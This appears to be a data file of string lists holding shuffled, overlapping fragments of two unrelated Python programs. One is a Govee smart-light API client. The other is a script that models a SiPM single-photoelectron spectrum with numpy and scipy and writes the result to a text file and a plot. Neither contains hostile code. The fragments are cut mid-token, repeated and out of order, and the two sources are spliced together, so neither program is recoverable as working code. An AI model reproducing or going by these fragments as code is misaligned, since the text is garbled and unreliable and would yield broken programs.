9000: err = f\"set_color_temp: invalid value", "self.devices, err def _get_device(self, device: Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get a device", "device_str in self._devices: state, err = await self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting state", "0, 0), color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off )", "offline self._set_online(False) err = \"error from aiohttp: %s\" % repr(ex) except Exception as", "device = self._get_device(device) return device @property def online(self): \"\"\"Last request was able to", "with/without authentication.\"\"\" if auth: return {\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager async def _api_put(self,", "_LOGGER.debug(\"ping\") start = time.time() ping_ok_delay = None err = None async with self._api_get(url=_API_PING,", "self._control(device, command, color_temp) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp =", "wrong: {result}\" else: result = await response.text() err = f\"API-Error {response.status}: {result}\" return", "the device DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do not send another control within n", "if not device: err = f\"Invalid device {device_str}, {device}\" else: if not device.controllable:", "don't sleep await asyncio.sleep(1) # set brightness as 0..254 brightness_set = brightness brightness_result", "= device.device if not device_str in self._devices: device = None # disallow unknown", "brightness_result_100 command = \"brightness\" result, err = await self._control(device, command, brightness_set) if err:" ]
[ "evaluate at spe_sigma : float Width of the single photoelectron peak opct :", "opct) * np.power(opct, N - 1) * binom(N - 1, 0))[:, 0] sap", "import embed from matplotlib import pyplot as plt import os def sipm_enf(x, spe_sigma,", "to optical crosstalk pct = ((1 - opct) * np.power(opct, N - 1)", "for the probability of afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0, type=float, help='Value for the", "= parser.parse_args() output_dir = args.output_dir spe_sigma = args.spe_sigma opct = args.opct pap =", "Can be used as an input to sim_telarray after normalisation with Konrads script", "float Probability of optical crosstalk pap : float Probability of afterpulse dap :", "from scipy.stats import norm from IPython import embed from matplotlib import pyplot as", ": ndarray X points to evaluate at spe_sigma : float Width of the", "= spe_sigma papk = np.power(1 - pap, N[:, 0]) p0ap = pct *", "\"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created figure : {}\".format(output_path)) if __name__ == '__main__':", "as np from scipy.special import binom from scipy.stats import norm from IPython import", "ArgumentDefaultsHelpFormatter as Formatter import numpy as np from scipy.special import binom from scipy.stats", "IPython import embed from matplotlib import pyplot as plt import os def sipm_enf(x,", "the probability of afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0, type=float, help='Value for the distance", "sap = spe_sigma papk = np.power(1 - pap, N[:, 0]) p0ap = pct", "{} pap = {} dap = {} \"\"\".format(spe_sigma, opct, pap, dap) ) x", "Resample x = np.linspace(x.min(), x.max(), 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap)", "formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers the case for a", "x = np.linspace(x.min(), x.max(), 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) if", "single photoelectron response for an SiPM. ' 'Can be used as an input", "dap) ) x = np.linspace(0, 100, 1000) y = sipm_enf(x, spe_sigma, opct, pap,", "after ' 'normalisation with Konrads script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir',", "used as an input to sim_telarray after ' 'normalisation with Konrads script') parser", ": float Distance of afterpulse peak from main peak \"\"\" n_peaks = 100", "the standard deviation of the single ' 'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1,", "\"\"\" n_peaks = 100 N = np.arange(n_peaks)[:, None] K = np.arange(1, n_peaks)[:, None]", "optical crosstalk pap : float Probability of afterpulse dap : float Distance of", "= {} opct = {} pap = {} dap = {} \"\"\".format(spe_sigma, opct,", "norm.pdf(x, K * (1.0-dap), ap_sigma) return signal.sum(0) def main(): description = ('Obtain the", "with Konrads script \"\"\" import argparse from argparse import ArgumentDefaultsHelpFormatter as Formatter import", "1) * binom(N - 1, 0))[:, 0] sap = spe_sigma papk = np.power(1", "np.arange(n_peaks)[:, None] K = np.arange(1, n_peaks)[:, None] # Probability of n fired microcells", "the single ' 'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1, type = float, help='Value", "afterpulse peak ' 'from main peak') args = parser.parse_args() output_dir = args.output_dir spe_sigma", "{} dap = {} \"\"\".format(spe_sigma, opct, pap, dap) ) x = np.linspace(0, 100,", "= pct * papk pap1 = pct * (1-papk) * papk pe_sigma =", "pap1 = pct * (1-papk) * papk pe_sigma = np.sqrt(K * spe_sigma **", "scipy.stats import norm from IPython import embed from matplotlib import pyplot as plt", "directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created config", "= args.dap print( \"\"\" SPE Parameters: spe_sigma = {} opct = {} pap", "ap_sigma = np.sqrt(K * sap ** 2) signal = p0ap[K] * norm.pdf(x, K,", "= float, help='Value for optical crosstalk') parser.add_argument('--pap', dest='pap', action='store', default=0, type=float, help='Value for", "input to sim_telarray after ' 'normalisation with Konrads script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter)", "# Resample x = np.linspace(x.min(), x.max(), 1000) y = sipm_enf(x, spe_sigma, opct, pap,", "= np.sqrt(K * spe_sigma ** 2) ap_sigma = np.sqrt(K * sap ** 2)", "os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created figure : {}\".format(output_path)) if __name__ ==", "\"\"\" import argparse from argparse import ArgumentDefaultsHelpFormatter as Formatter import numpy as np", "opct = args.opct pap = args.pap dap = args.dap print( \"\"\" SPE Parameters:", "Distance of afterpulse peak from main peak \"\"\" n_peaks = 100 N =", "single photoelectron peak opct : float Probability of optical crosstalk pap : float", "- pap, N[:, 0]) p0ap = pct * papk pap1 = pct *", "dap) if not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path,", "spe_sigma, opct, pap, dap) if not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path =", "* norm.pdf(x, K, pe_sigma) signal += pap1[K] * norm.pdf(x, K * (1.0-dap), ap_sigma)", "type=float, help='Value for the standard deviation of the single ' 'photoelectron peak') parser.add_argument('--opct',", "of the afterpulse peak ' 'from main peak') args = parser.parse_args() output_dir =", "of afterpulse dap : float Distance of afterpulse peak from main peak \"\"\"", "default=0, type=float, help='Value for the probability of afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0, type=float,", "np.power(1 - pap, N[:, 0]) p0ap = pct * papk pap1 = pct", "# Probability of n fired microcells due to optical crosstalk pct = ((1", "type = float, help='Value for optical crosstalk') parser.add_argument('--pap', dest='pap', action='store', default=0, type=float, help='Value", "matplotlib import pyplot as plt import os def sipm_enf(x, spe_sigma, opct, pap, dap):", "float Width of the single photoelectron peak opct : float Probability of optical", "Formatter import numpy as np from scipy.special import binom from scipy.stats import norm", "= ('Obtain the single photoelectron response for an SiPM. ' 'Can be used", "for the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float, help='Value for the standard deviation", "from matplotlib import pyplot as plt import os def sipm_enf(x, spe_sigma, opct, pap,", "type=float, help='Value for the distance of the afterpulse peak ' 'from main peak')", "import norm from IPython import embed from matplotlib import pyplot as plt import", "{} opct = {} pap = {} dap = {} \"\"\".format(spe_sigma, opct, pap,", "> 1E-15 x = x[gt] y = y[gt] # Resample x = np.linspace(x.min(),", "import numpy as np from scipy.special import binom from scipy.stats import norm from", "= np.linspace(x.min(), x.max(), 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) if not", ": float Probability of optical crosstalk pap : float Probability of afterpulse dap", "Probability of afterpulse dap : float Distance of afterpulse peak from main peak", "as Formatter import numpy as np from scipy.special import binom from scipy.stats import", "opct = {} pap = {} dap = {} \"\"\".format(spe_sigma, opct, pap, dap)", "opct, pap, dap) gt = y > 1E-15 x = x[gt] y =", "dap = {} \"\"\".format(spe_sigma, opct, pap, dap) ) x = np.linspace(0, 100, 1000)", "Probability of n fired microcells due to optical crosstalk pct = ((1 -", "parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True, help='Output directory for the", "for a 100% probability of a single inital fired microcell Parameters ---------- x", "of afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0, type=float, help='Value for the distance of the", "(1-papk) * papk pe_sigma = np.sqrt(K * spe_sigma ** 2) ap_sigma = np.sqrt(K", "1, 0))[:, 0] sap = spe_sigma papk = np.power(1 - pap, N[:, 0])", "points to evaluate at spe_sigma : float Width of the single photoelectron peak", "= args.opct pap = args.pap dap = args.dap print( \"\"\" SPE Parameters: spe_sigma", "x : ndarray X points to evaluate at spe_sigma : float Width of", "0]) p0ap = pct * papk pap1 = pct * (1-papk) * papk", "= np.sqrt(K * sap ** 2) signal = p0ap[K] * norm.pdf(x, K, pe_sigma)", "parser.add_argument('--pap', dest='pap', action='store', default=0, type=float, help='Value for the probability of afterpulses') parser.add_argument('--dap', dest='dap',", "parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True, help='Output directory for the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store',", "of the single ' 'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1, type = float,", "def main(): description = ('Obtain the single photoelectron response for an SiPM. '", "pyplot as plt import os def sipm_enf(x, spe_sigma, opct, pap, dap): \"\"\" SiPM", "args.pap dap = args.dap print( \"\"\" SPE Parameters: spe_sigma = {} opct =", "print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created", "2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers the case for a 100% probability of", "considers the case for a 100% probability of a single inital fired microcell", "type=float, help='Value for the probability of afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0, type=float, help='Value", "crosstalk pap : float Probability of afterpulse dap : float Distance of afterpulse", "files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float, help='Value for the standard deviation of the", "X points to evaluate at spe_sigma : float Width of the single photoelectron", ": float Probability of afterpulse dap : float Distance of afterpulse peak from", "input to sim_telarray after normalisation with Konrads script \"\"\" import argparse from argparse", "* norm.pdf(x, K * (1.0-dap), ap_sigma) return signal.sum(0) def main(): description = ('Obtain", "fired microcell Parameters ---------- x : ndarray X points to evaluate at spe_sigma", "p0ap = pct * papk pap1 = pct * (1-papk) * papk pe_sigma", "required=True, help='Output directory for the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float, help='Value for", "dest='output_dir', action='store', required=True, help='Output directory for the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float,", "pap : float Probability of afterpulse dap : float Distance of afterpulse peak", "deviation of the single ' 'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1, type =", "for optical crosstalk') parser.add_argument('--pap', dest='pap', action='store', default=0, type=float, help='Value for the probability of", "peak ' 'from main peak') args = parser.parse_args() output_dir = args.output_dir spe_sigma =", "pap = {} dap = {} \"\"\".format(spe_sigma, opct, pap, dap) ) x =", "Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers the case for a 100% probability", "* sap ** 2) signal = p0ap[K] * norm.pdf(x, K, pe_sigma) signal +=", "parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float, help='Value for the standard deviation of the single", "sipm_enf(x, spe_sigma, opct, pap, dap): \"\"\" SiPM formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This", "http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers the case for a 100% probability of a", "papk pap1 = pct * (1-papk) * papk pe_sigma = np.sqrt(K * spe_sigma", "signal.sum(0) def main(): description = ('Obtain the single photoelectron response for an SiPM.", "photoelectron response for an SiPM. ' 'Can be used as an input to", "action='store', default=0, type=float, help='Value for the probability of afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0,", "the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float, help='Value for the standard deviation of", "the single photoelectron response for an SiPM. Can be used as an input", "crosstalk pct = ((1 - opct) * np.power(opct, N - 1) * binom(N", "be used as an input to sim_telarray after ' 'normalisation with Konrads script')", "help='Output directory for the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float, help='Value for the", "for the distance of the afterpulse peak ' 'from main peak') args =", "None] # Probability of n fired microcells due to optical crosstalk pct =", "\"\"\" SPE Parameters: spe_sigma = {} opct = {} pap = {} dap", "Probability of optical crosstalk pap : float Probability of afterpulse dap : float", "an input to sim_telarray after ' 'normalisation with Konrads script') parser = argparse.ArgumentParser(description=description,", "if not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x,", "= {} \"\"\".format(spe_sigma, opct, pap, dap) ) x = np.linspace(0, 100, 1000) y", "not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y,", "output_dir = args.output_dir spe_sigma = args.spe_sigma opct = args.opct pap = args.pap dap", "parser.add_argument('--dap', dest='dap', action='store', default=0, type=float, help='Value for the distance of the afterpulse peak", "os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created config : {}\".format(output_path))", "' 'Can be used as an input to sim_telarray after ' 'normalisation with", "due to optical crosstalk pct = ((1 - opct) * np.power(opct, N -", "* binom(N - 1, 0))[:, 0] sap = spe_sigma papk = np.power(1 -", "SiPM. Can be used as an input to sim_telarray after normalisation with Konrads", "probability of a single inital fired microcell Parameters ---------- x : ndarray X", "photoelectron response for an SiPM. Can be used as an input to sim_telarray", "at spe_sigma : float Width of the single photoelectron peak opct : float", "'--output', dest='output_dir', action='store', required=True, help='Output directory for the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1,", "an SiPM. Can be used as an input to sim_telarray after normalisation with", "100, 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) gt = y >", "= np.power(1 - pap, N[:, 0]) p0ap = pct * papk pap1 =", "formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True, help='Output directory for the files') parser.add_argument('--spe_sigma', dest='spe_sigma',", "Parameters ---------- x : ndarray X points to evaluate at spe_sigma : float", "n_peaks = 100 N = np.arange(n_peaks)[:, None] K = np.arange(1, n_peaks)[:, None] #", "of n fired microcells due to optical crosstalk pct = ((1 - opct)", "- 1) * binom(N - 1, 0))[:, 0] sap = spe_sigma papk =", "gt = y > 1E-15 x = x[gt] y = y[gt] # Resample", "as an input to sim_telarray after normalisation with Konrads script \"\"\" import argparse", "0] sap = spe_sigma papk = np.power(1 - pap, N[:, 0]) p0ap =", "{} \"\"\".format(spe_sigma, opct, pap, dap) ) x = np.linspace(0, 100, 1000) y =", "Konrads script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True, help='Output directory", "sim_telarray after normalisation with Konrads script \"\"\" import argparse from argparse import ArgumentDefaultsHelpFormatter", "dap = args.dap print( \"\"\" SPE Parameters: spe_sigma = {} opct = {}", "args.dap print( \"\"\" SPE Parameters: spe_sigma = {} opct = {} pap =", "import os def sipm_enf(x, spe_sigma, opct, pap, dap): \"\"\" SiPM formula from Gentile", "= np.linspace(0, 100, 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) gt =", "SiPM formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers the case for", "1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) gt = y > 1E-15", "distance of the afterpulse peak ' 'from main peak') args = parser.parse_args() output_dir", "x = np.linspace(0, 100, 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) gt", "y = sipm_enf(x, spe_sigma, opct, pap, dap) if not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir))", "y, y))) print(\"Created config : {}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path,", "np.sqrt(K * spe_sigma ** 2) ap_sigma = np.sqrt(K * sap ** 2) signal", "pap, dap) ) x = np.linspace(0, 100, 1000) y = sipm_enf(x, spe_sigma, opct,", "\"\"\" Obtain the single photoelectron response for an SiPM. Can be used as", ": {}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created figure :", "import argparse from argparse import ArgumentDefaultsHelpFormatter as Formatter import numpy as np from", "' 'from main peak') args = parser.parse_args() output_dir = args.output_dir spe_sigma = args.spe_sigma", "(1.0-dap), ap_sigma) return signal.sum(0) def main(): description = ('Obtain the single photoelectron response", "pct * papk pap1 = pct * (1-papk) * papk pe_sigma = np.sqrt(K", "np.arange(1, n_peaks)[:, None] # Probability of n fired microcells due to optical crosstalk", "100 N = np.arange(n_peaks)[:, None] K = np.arange(1, n_peaks)[:, None] # Probability of", "signal = p0ap[K] * norm.pdf(x, K, pe_sigma) signal += pap1[K] * norm.pdf(x, K", "* papk pe_sigma = np.sqrt(K * spe_sigma ** 2) ap_sigma = np.sqrt(K *", "N - 1) * binom(N - 1, 0))[:, 0] sap = spe_sigma papk", "import pyplot as plt import os def sipm_enf(x, spe_sigma, opct, pap, dap): \"\"\"", "* (1.0-dap), ap_sigma) return signal.sum(0) def main(): description = ('Obtain the single photoelectron", "pct * (1-papk) * papk pe_sigma = np.sqrt(K * spe_sigma ** 2) ap_sigma", "pap, dap): \"\"\" SiPM formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers", "inital fired microcell Parameters ---------- x : ndarray X points to evaluate at", "for the standard deviation of the single ' 'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store',", "spe_sigma ** 2) ap_sigma = np.sqrt(K * sap ** 2) signal = p0ap[K]", "pap, dap) gt = y > 1E-15 x = x[gt] y = y[gt]", "os def sipm_enf(x, spe_sigma, opct, pap, dap): \"\"\" SiPM formula from Gentile 2010", "crosstalk') parser.add_argument('--pap', dest='pap', action='store', default=0, type=float, help='Value for the probability of afterpulses') parser.add_argument('--dap',", "microcells due to optical crosstalk pct = ((1 - opct) * np.power(opct, N", "the single photoelectron response for an SiPM. ' 'Can be used as an", "spe_sigma papk = np.power(1 - pap, N[:, 0]) p0ap = pct * papk", "= x[gt] y = y[gt] # Resample x = np.linspace(x.min(), x.max(), 1000) y", "* np.power(opct, N - 1) * binom(N - 1, 0))[:, 0] sap =", "float Distance of afterpulse peak from main peak \"\"\" n_peaks = 100 N", "* papk pap1 = pct * (1-papk) * papk pe_sigma = np.sqrt(K *", "os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y)))", "after normalisation with Konrads script \"\"\" import argparse from argparse import ArgumentDefaultsHelpFormatter as", "\"\"\".format(spe_sigma, opct, pap, dap) ) x = np.linspace(0, 100, 1000) y = sipm_enf(x,", "= pct * (1-papk) * papk pe_sigma = np.sqrt(K * spe_sigma ** 2)", "spe_sigma = args.spe_sigma opct = args.opct pap = args.pap dap = args.dap print(", "pe_sigma) signal += pap1[K] * norm.pdf(x, K * (1.0-dap), ap_sigma) return signal.sum(0) def", "embed from matplotlib import pyplot as plt import os def sipm_enf(x, spe_sigma, opct,", "p0ap[K] * norm.pdf(x, K, pe_sigma) signal += pap1[K] * norm.pdf(x, K * (1.0-dap),", "dest='pap', action='store', default=0, type=float, help='Value for the probability of afterpulses') parser.add_argument('--dap', dest='dap', action='store',", "the single photoelectron peak opct : float Probability of optical crosstalk pap :", "print( \"\"\" SPE Parameters: spe_sigma = {} opct = {} pap = {}", "Width of the single photoelectron peak opct : float Probability of optical crosstalk", "opct : float Probability of optical crosstalk pap : float Probability of afterpulse", "the afterpulse peak ' 'from main peak') args = parser.parse_args() output_dir = args.output_dir", "1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) if not os.path.exists(output_dir): print(\"Creating directory:", "peak opct : float Probability of optical crosstalk pap : float Probability of", "= args.spe_sigma opct = args.opct pap = args.pap dap = args.dap print( \"\"\"", "y))) print(\"Created config : {}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight')", "as plt import os def sipm_enf(x, spe_sigma, opct, pap, dap): \"\"\" SiPM formula", "parser.add_argument('--opct', dest='opct', action='store', default=0.1, type = float, help='Value for optical crosstalk') parser.add_argument('--pap', dest='pap',", "be used as an input to sim_telarray after normalisation with Konrads script \"\"\"", "None] K = np.arange(1, n_peaks)[:, None] # Probability of n fired microcells due", "float Probability of afterpulse dap : float Distance of afterpulse peak from main", "= y[gt] # Resample x = np.linspace(x.min(), x.max(), 1000) y = sipm_enf(x, spe_sigma,", "ap_sigma) return signal.sum(0) def main(): description = ('Obtain the single photoelectron response for", "script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True, help='Output directory for", "afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0, type=float, help='Value for the distance of the afterpulse", "only considers the case for a 100% probability of a single inital fired", "ndarray X points to evaluate at spe_sigma : float Width of the single", "opct, pap, dap): \"\"\" SiPM formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only", "N[:, 0]) p0ap = pct * papk pap1 = pct * (1-papk) *", "opct, pap, dap) if not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir,", "sim_telarray after ' 'normalisation with Konrads script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output',", "from IPython import embed from matplotlib import pyplot as plt import os def", "= y > 1E-15 x = x[gt] y = y[gt] # Resample x", "an input to sim_telarray after normalisation with Konrads script \"\"\" import argparse from", "np.power(opct, N - 1) * binom(N - 1, 0))[:, 0] sap = spe_sigma", "K = np.arange(1, n_peaks)[:, None] # Probability of n fired microcells due to", "standard deviation of the single ' 'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1, type", "= p0ap[K] * norm.pdf(x, K, pe_sigma) signal += pap1[K] * norm.pdf(x, K *", "binom(N - 1, 0))[:, 0] sap = spe_sigma papk = np.power(1 - pap,", "dest='spe_sigma', action='store', default=0.1, type=float, help='Value for the standard deviation of the single '", "- 1, 0))[:, 0] sap = spe_sigma papk = np.power(1 - pap, N[:,", "args = parser.parse_args() output_dir = args.output_dir spe_sigma = args.spe_sigma opct = args.opct pap", "x[gt] y = y[gt] # Resample x = np.linspace(x.min(), x.max(), 1000) y =", "x = x[gt] y = y[gt] # Resample x = np.linspace(x.min(), x.max(), 1000)", "y > 1E-15 x = x[gt] y = y[gt] # Resample x =", "dap : float Distance of afterpulse peak from main peak \"\"\" n_peaks =", "sap ** 2) signal = p0ap[K] * norm.pdf(x, K, pe_sigma) signal += pap1[K]", "to sim_telarray after normalisation with Konrads script \"\"\" import argparse from argparse import", "* spe_sigma ** 2) ap_sigma = np.sqrt(K * sap ** 2) signal =", "** 2) signal = p0ap[K] * norm.pdf(x, K, pe_sigma) signal += pap1[K] *", "of a single inital fired microcell Parameters ---------- x : ndarray X points", "from argparse import ArgumentDefaultsHelpFormatter as Formatter import numpy as np from scipy.special import", "argparse import ArgumentDefaultsHelpFormatter as Formatter import numpy as np from scipy.special import binom", "single photoelectron response for an SiPM. Can be used as an input to", "y = sipm_enf(x, spe_sigma, opct, pap, dap) gt = y > 1E-15 x", "spe_sigma = {} opct = {} pap = {} dap = {} \"\"\".format(spe_sigma,", "Obtain the single photoelectron response for an SiPM. Can be used as an", "import binom from scipy.stats import norm from IPython import embed from matplotlib import", "np.column_stack((x, y, y))) print(\"Created config : {}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y)", "print(\"Created config : {}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created", "'normalisation with Konrads script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True,", "{}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created config :", "spe_sigma, opct, pap, dap): \"\"\" SiPM formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation", "= args.output_dir spe_sigma = args.spe_sigma opct = args.opct pap = args.pap dap =", "peak \"\"\" n_peaks = 100 N = np.arange(n_peaks)[:, None] K = np.arange(1, n_peaks)[:,", "= {} dap = {} \"\"\".format(spe_sigma, opct, pap, dap) ) x = np.linspace(0,", "action='store', default=0.1, type = float, help='Value for optical crosstalk') parser.add_argument('--pap', dest='pap', action='store', default=0,", "description = ('Obtain the single photoelectron response for an SiPM. ' 'Can be", "argparse from argparse import ArgumentDefaultsHelpFormatter as Formatter import numpy as np from scipy.special", "with Konrads script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True, help='Output", "'from main peak') args = parser.parse_args() output_dir = args.output_dir spe_sigma = args.spe_sigma opct", "scipy.special import binom from scipy.stats import norm from IPython import embed from matplotlib", "of optical crosstalk pap : float Probability of afterpulse dap : float Distance", "Parameters: spe_sigma = {} opct = {} pap = {} dap = {}", "K, pe_sigma) signal += pap1[K] * norm.pdf(x, K * (1.0-dap), ap_sigma) return signal.sum(0)", "response for an SiPM. ' 'Can be used as an input to sim_telarray", "y[gt] # Resample x = np.linspace(x.min(), x.max(), 1000) y = sipm_enf(x, spe_sigma, opct,", "1E-15 x = x[gt] y = y[gt] # Resample x = np.linspace(x.min(), x.max(),", "spe_sigma, opct, pap, dap) gt = y > 1E-15 x = x[gt] y", "x.max(), 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) if not os.path.exists(output_dir): print(\"Creating", "opct, pap, dap) ) x = np.linspace(0, 100, 1000) y = sipm_enf(x, spe_sigma,", "pap, dap) if not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\")", "photoelectron peak opct : float Probability of optical crosstalk pap : float Probability", "np.sqrt(K * sap ** 2) signal = p0ap[K] * norm.pdf(x, K, pe_sigma) signal", "('Obtain the single photoelectron response for an SiPM. ' 'Can be used as", "script \"\"\" import argparse from argparse import ArgumentDefaultsHelpFormatter as Formatter import numpy as", "from scipy.special import binom from scipy.stats import norm from IPython import embed from", "spe_sigma : float Width of the single photoelectron peak opct : float Probability", "sipm_enf(x, spe_sigma, opct, pap, dap) gt = y > 1E-15 x = x[gt]", "= ((1 - opct) * np.power(opct, N - 1) * binom(N - 1,", "the case for a 100% probability of a single inital fired microcell Parameters", "single inital fired microcell Parameters ---------- x : ndarray X points to evaluate", "= np.arange(1, n_peaks)[:, None] # Probability of n fired microcells due to optical", "np from scipy.special import binom from scipy.stats import norm from IPython import embed", "dest='dap', action='store', default=0, type=float, help='Value for the distance of the afterpulse peak '", "papk pe_sigma = np.sqrt(K * spe_sigma ** 2) ap_sigma = np.sqrt(K * sap", "help='Value for the standard deviation of the single ' 'photoelectron peak') parser.add_argument('--opct', dest='opct',", "help='Value for optical crosstalk') parser.add_argument('--pap', dest='pap', action='store', default=0, type=float, help='Value for the probability", "pap1[K] * norm.pdf(x, K * (1.0-dap), ap_sigma) return signal.sum(0) def main(): description =", "action='store', default=0, type=float, help='Value for the distance of the afterpulse peak ' 'from", "from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers the case for a 100%", "pe_sigma = np.sqrt(K * spe_sigma ** 2) ap_sigma = np.sqrt(K * sap **", "+= pap1[K] * norm.pdf(x, K * (1.0-dap), ap_sigma) return signal.sum(0) def main(): description", "= 100 N = np.arange(n_peaks)[:, None] K = np.arange(1, n_peaks)[:, None] # Probability", "main peak \"\"\" n_peaks = 100 N = np.arange(n_peaks)[:, None] K = np.arange(1,", "of afterpulse peak from main peak \"\"\" n_peaks = 100 N = np.arange(n_peaks)[:,", "norm from IPython import embed from matplotlib import pyplot as plt import os", "args.output_dir spe_sigma = args.spe_sigma opct = args.opct pap = args.pap dap = args.dap", "output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created config : {}\".format(output_path)) output_path", "peak') args = parser.parse_args() output_dir = args.output_dir spe_sigma = args.spe_sigma opct = args.opct", ": float Width of the single photoelectron peak opct : float Probability of", "0))[:, 0] sap = spe_sigma 